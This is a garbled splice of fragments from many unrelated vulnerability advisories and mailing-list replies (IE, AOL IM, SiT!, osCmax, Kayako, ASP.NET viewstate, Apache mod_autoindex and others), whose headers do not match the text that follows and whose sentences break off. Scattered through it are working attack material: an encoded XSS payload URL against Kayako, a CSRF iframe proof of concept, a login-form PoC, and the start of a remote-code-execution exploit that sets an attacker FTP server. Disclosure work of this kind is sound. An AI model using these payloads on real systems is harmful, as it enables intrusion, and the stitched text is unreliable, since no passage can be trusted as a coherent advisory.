conducted and published in 2008 [1]. This advisory describes a
vulnerability that provides access to the contents of any file stored in
the local filesystem of users' machines running vulnerable versions of IE.
Exploitation of the vulnerability relies solely on the ability of a
would-be attacker to provide malicious HTML content from a website and
to predict the full pathname of the file that will be used to cache it
locally on the victim's system. If the entire path name can be
predicted, the attacker can cause a redirection to the locally stored
file using a URI specified in UNC form and force the local content to
be rendered as an HTML document, which permits running scripting
-----Original Message-----
From: Core Security Technologies Advisories [mailto:advisories@coresecurity.com]
Sent: Tuesday, September 25, 2007 6:21 PM
To: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk; vulnwatch@vulnwatch.org; NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: CORE-2007-0817: Remote Command execution, HTML and JavaScript injection vulnerabilities in AOL's Instant Messaging software
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies – CoreLabs Advisory
http://www.coresecurity.com/corelabs
Remote command execution, HTML and JavaScript injection vulnerabilities in
AOL’s Instant Messaging software
*Advisory Information*
Title: Remote Command execution, HTML and JavaScript injection
Vulnerability ID: HTB23043
Reference: https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_sit_support_incident_tracker.html
Product: SiT! Support Incident Tracker
Vendor: The Support Incident Tracker Project ( http://sitracker.org/ )
Vulnerable Version: 3.64 and probably prior
Tested Version: 3.64
Vendor Notification: 24 August 2011
Vulnerability Type: SQL Injection, XSS, CSRF
Status: Fixed by Vendor
Risk level: High
1) Input passed to the "clientid" parameter in "www/admin/banner-acl.php",
"www/admin/banner-edit.php", "www/admin/campaign-zone.php",
"www/admin/advertiser-campaigns.php", "www/admin/campaign-banners.php",
and "www/admin/banner-activate.php" is not properly
sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in
the context of an affected site.
2) Input passed to the "orderdirection" and "listorder" parameters in
"www/admin/userlog-index.php" and "www/admin/stats.php" is not
properly sanitised before being returned to the user. This can be
CVE-2009-1687
The JavaScript garbage collector in WebKit does not properly handle allocation
failures, which allows remote attackers to execute arbitrary code or cause a
denial of service (memory corruption and application crash) via a crafted HTML
document that triggers write access to an "offset of a NULL pointer."
CVE-2009-1690
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in osCmax, which can be exploited to perform SQL Injection and Cross-Site Scripting (XSS) attacks.
1) Multiple Cross-Site Scripting (XSS) in osCmax: CVE-2012-1664
1.1 Input passed via the "username" POST parameter to /admin/login.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
<form action="http://[host]/admin/login.php?action=process" method="post" name="main" id="main">
More Details
============
To prevent the execution of JavaScript and VBScript code in HTML emails
and to remove unwanted HTML tags, the IceWarp WebMail Server filters HTML
emails with the function cleanHTML() that is defined in the PHP file
html/webmail/server/inc/tools.php
For more information refer to the bulletin:
http://www.microsoft.com/technet/security/bulletin/ms08-048.mspx
Workarounds communicated by the vendor include:
* Locking down the MHTML protocol handler. Below are the required
registry changes.
/-----------
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet
HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 02:25:31 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 590
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
Vulnerability ID: HTB23015
Reference: http://www.htbridge.ch/advisory/easewe_ftp_ocx_activex_control_execute_insecure_method.html
Product: Easewe FTP OCX ActiveX Control
Vendor: Easewe Software ( http://www.ftpocx.com )
Vulnerable Version: 4.5.0.9 and probably prior
Tested on: 4.5.0.9
Vendor Notification: 01 June 2011
Vulnerability Type: ActiveX Control Insecure Method
Risk level: High
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )
I. Description
The Palm Pre WebOS version 1.0.4 and below allows a remote attacker to execute arbitrary HTML code on the phone via certain applications. The affected applications involve the native email client via the notifications system as well as the native calendar application.
The vendor has been contacted and a patch has been released:
WebOS 1.1 - http://kb.palm.com/wps/portal/kb/na/pre/p100eww/sprint/solutions/article/50607_en.html#11
II. Impact
The site URL and title are extracted and put in clear
text at the beginning of the 2000-byte block.
The preview content which appears on
opera:historysearch page for the site is compressed
into the file md.dat. However, the HTML encoding is
not consistent across the URL scheme of the site and
the injection is possible in the optional fragment of
the URL (after the # character).
The following sequence summarises an attack scenario:
Vulnerabilities in kses-based HTML filters
==========================================
During internal code review performed by Allegro.pl, some weaknesses
were discovered in kses - PHP HTML/XHTML filter. HTML filters using or
based on kses are part of many popular projects, including WordPress,
Moodle, Drupal, eGroupWare, Dokeos, PHP-Nuke, Geeklog and others. Issues
found range from cross-site scripting to code execution, depending on
implementation.
The 'Host:' header
The URL
The HTTP method
If we probe for XSS using the 'Host:' header, Apache correctly filters the angle brackets and replaces them with HTML entities:
REQUEST:
GET / HTTP/1.1
Host: <BADCHARS>
modifies the remote administration to allow any user to connect externally,
and modifies the DNS information.
## smcd3g-csrf-poc.htm
<html>
<body>
<iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1">
</iframe>
---[ Vulnerability description ]
Positive Research Center has discovered multiple XSS vulnerabilities in Kayako Support Suite.
The application insufficiently verifies the incoming "subscriberdata" parameter in the /staff/index.php?_m=news&_a=importexport script.
An attacker with "staff" privileges can use the vulnerability to inject and execute arbitrary HTML code and scripts in a user's browser within the trust relationship between the browser and the server.
To use the vulnerability an attacker should convince a user with "staff" privileges to open a URL like:
http://example.com/support/staff/index.php?_m=news&_a=managesubscribers&importsub=1&resultdata=YTo0OntzOjEzOiJzdWNjZXNzZW1haWxzIjtpOjA7czoxMjoiZmFpbGVkZW1haWxzIjtpOjE7czoxMToidG90YWxlbWFpbHMiO2k6MTtzOjk6ImVtYWlsbGlzdCI7czo5MDoiPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD5APHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4uPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4gIjt9
The application insufficiently verifies the incoming "subject" parameter in the /staff/index.php?_m=news&_a=insertnews script.
An attacker with "staff" privileges can use the vulnerability to inject and execute arbitrary HTML code and scripts in a user's browser within the trust relationship between the browser and the server.
An attacker should trick a user with "staff" privileges into opening a URL like:
Published: 2010-02-08 Version: 1.1
SpiderLabs has documented view state tampering
vulnerabilities in three products from separate vendors.
View states are used by some web application frameworks to
store the state of HTML GUI controls. View states are
typically stored in hidden client-side input fields,
although server-side storage is widely supported.
The affected vendors generally recommend that client-side
view states are cryptographically signed and/or encrypted,
>> message box asking the user's permission to call the given number. The
>> user is presented with the simple choice to either press call or
>> cancel.
>>
>> A TEL URI can be opened automatically if the TEL URI is used as the
>> source of an HTML iframe or frame, as the URL of a meta refresh, as
>> the location of a HTTP 30X redirect, and as the location of the
>> current or a new window using javascript.
>>
>> We discovered a security vulnerability that dismisses the "ask for
>> permission to call" dialog in a way that chooses the "call" option
The key part of the advisory for me wasn't VIEWSTATE as much as it was the controls, but this statement you made seemed pretty outrageous (with regard to ASP.NET):
'These vulnerabilities show that unsigned client-side viewstates will ALWAYS result in a vulnerability in the affected products.'
I would disagree - it depends how the software developer implemented use of the VIEWSTATE's content. In ASP.NET, the interesting part here was that you appeared to be controlling an innerhtml property of a Form control through the VIEWSTATE. What your example didn't show, I'm assuming, is some code behind that pulled out the <IndexedString> and set the value in the form's innerHtml property/attribute. That's just dangerous coding, akin to trusting client-side input and no different than acting on client input that came from any method, form input, JSON, etc. Your repro was a bit confusing/misleading without that part. Otherwise, were you saying that some controls inherently populate their properties/attributes from VIEWSTATE content automagically?
There have been past discussions on VIEWSTATE's security:
Scott Mitchell documented tampering VIEWSTATE in a 2004 article:
http://msdn.microsoft.com/en-us/library/ms972976.aspx#viewstate_topic12
AdPeeps Ad Rotator - XSS and HTML Injection Vulnerabilities
Version Affected: 8.5d1 (3-18-09) (newest)
Info: Ad Peeps is a banner rotator and text ad rotator, all in one, that allows you to track, sell and manage banner ads, rich-media/flash ads and text ads on your website. Built using PHP/MySQL, Ad Peeps provides you and your advertisers with highly detailed real-time statistics and is capable of delivering millions of impressions per day on a typical shared web server. Plus, you can try it right now on your website with our 7 day trial.
Ad Peeps is so versatile that it can even show your text ads Yahoo! style or Google AdWords style. Unlike many other banner ad rotator programs, Ad Peeps was skillfully designed to use minimal server resources while maintaining speed and unparalleled performance. Built on a highly scalable and versatile database architecture, Ad Peeps works without fuss even on high traffic web sites and won't crash your high powered website.
Opinion: AdPeeps, along with many others should really hire people to audit their code.
While discussion of the vulnerability is great, it would be nice for us to retain some credit; the advisory represents the culmination of a lot of research work. The PDF that accompanies the hacking-lab movie is basically just a copy & paste from our advisory with no attribution. Anyone that goes to the hacking-lab website directly would incorrectly assume that the movie & PDF represent original research work by Compass Security.
I imagine that videos of our BlackHat presentation (http://www.blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Byrne ) will hit the web soon too. We have a live demo of the .Net vulnerability and the JavaServer Faces exploit.
Thanks,
David Byrne
Senior Security Consultant
Trustwave - SpiderLabs, Application Security
///////////////////////////////////
//Remote code execution PoC exploit
///////////////////////////////////
<html>
<head>
<script language="JavaScript">
var attackersFtpServerAddress="attacker.ftp.server";
The XSS (UTF-7) exists in mod_autoindex.c. No charset is defined, so an XSS attack is possible through the "P" option available in Apache 2.2.4 by setting the charset to UTF-7.
"P=pattern lists only files matching the given pattern"
More: http://httpd.apache.org/docs/2.0/mod/mod_autoindex.html
- -Source code from mod_autoindex.c--------------
#if APR_HAS_UNICODE_FS
ap_set_content_type(r, "text/html;charset=utf-8");
#else
login" setting by default, which makes it easier for remote
attackers to conduct session fixation attacks.
CVE-2010-1614
Multiple cross-site scripting (XSS) vulnerabilities allow
remote attackers to inject arbitrary web script or HTML via
vectors related to (1) the Login-As feature or (2) when the
global search feature is enabled, unspecified global search
forms in the Global Search Engine.
CVE-2010-1615